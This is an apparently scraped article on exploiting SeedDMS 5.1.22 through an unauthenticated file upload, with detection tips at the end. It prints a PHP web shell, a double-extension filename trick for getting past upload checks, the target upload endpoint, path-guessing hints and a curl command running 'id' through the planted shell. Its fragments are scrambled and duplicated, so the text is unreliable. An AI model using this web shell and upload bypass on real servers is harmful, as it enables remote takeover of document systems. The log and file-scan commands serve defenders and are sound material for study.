find /var/www/seeddms/data -type f -size -10k -exec grep -l "eval\|system\|base64_decode" {} \; Monitor for GET requests from the SeedDMS server to unusual external IPs (C2 callbacks) or DNS lookups for suspicious domains. Conclusion The SeedDMS 5.1.22 exploit serves as a textbook case of how a missing authentication check, combined with a weak file upload filter, can lead to a full system compromise. The attack surface is small, the request is simple, and the payoff (RCE) is total.
<?php system($_GET['cmd']); ?> Rename or embed as needed. To bypass weak MIME checks, set the filename to evil.php.jpg —but the system may still save it as .php depending on the upload routine. Send a POST request to /op/op.AddFile.php with forged parameters. seeddms 5.1.22 exploit
/data/<folderid>/<documentid>/<version>/<filename> Without prior documents, the system may assign a new document ID. The exact path can be brute-forced or inferred by attempting to access: find /var/www/seeddms/data -type f -size -10k -exec grep
grep "op.AddFile.php" /var/log/apache2/access.log | grep -B1 "POST" If you see POST requests from an IP that never visited out.Login.php , that's a red flag. Recursively search for PHP files in the data/ directory: as with any web application
Alternatively, check for predictable patterns: data/temp/ or data/cache/ . Once the shell's URL is confirmed:
Introduction SeedDMS (formerly LetoDMS) is a popular, open-source document management system known for its simplicity and effectiveness in small to medium-sized enterprises. However, as with any web application, version-specific vulnerabilities can turn this asset into a liability.
curl "http://192.168.1.100/seeddms51/data/1000/1/1/evil.php?cmd=id" Output: uid=33(www-data) gid=33(www-data) ...
find /var/www/seeddms/data -type f -size -10k -exec grep -l "eval\|system\|base64_decode" {} \; Monitor for GET requests from the SeedDMS server to unusual external IPs (C2 callbacks) or DNS lookups for suspicious domains. Conclusion The SeedDMS 5.1.22 exploit serves as a textbook case of how a missing authentication check, combined with a weak file upload filter, can lead to a full system compromise. The attack surface is small, the request is simple, and the payoff (RCE) is total.
<?php system($_GET['cmd']); ?> Rename or embed as needed. To bypass weak MIME checks, set the filename to evil.php.jpg —but the system may still save it as .php depending on the upload routine. Send a POST request to /op/op.AddFile.php with forged parameters.
/data/<folderid>/<documentid>/<version>/<filename> Without prior documents, the system may assign a new document ID. The exact path can be brute-forced or inferred by attempting to access:
grep "op.AddFile.php" /var/log/apache2/access.log | grep -B1 "POST" If you see POST requests from an IP that never visited out.Login.php , that's a red flag. Recursively search for PHP files in the data/ directory:
Alternatively, check for predictable patterns: data/temp/ or data/cache/ . Once the shell's URL is confirmed:
Introduction SeedDMS (formerly LetoDMS) is a popular, open-source document management system known for its simplicity and effectiveness in small to medium-sized enterprises. However, as with any web application, version-specific vulnerabilities can turn this asset into a liability.
curl "http://192.168.1.100/seeddms51/data/1000/1/1/evil.php?cmd=id" Output: uid=33(www-data) gid=33(www-data) ...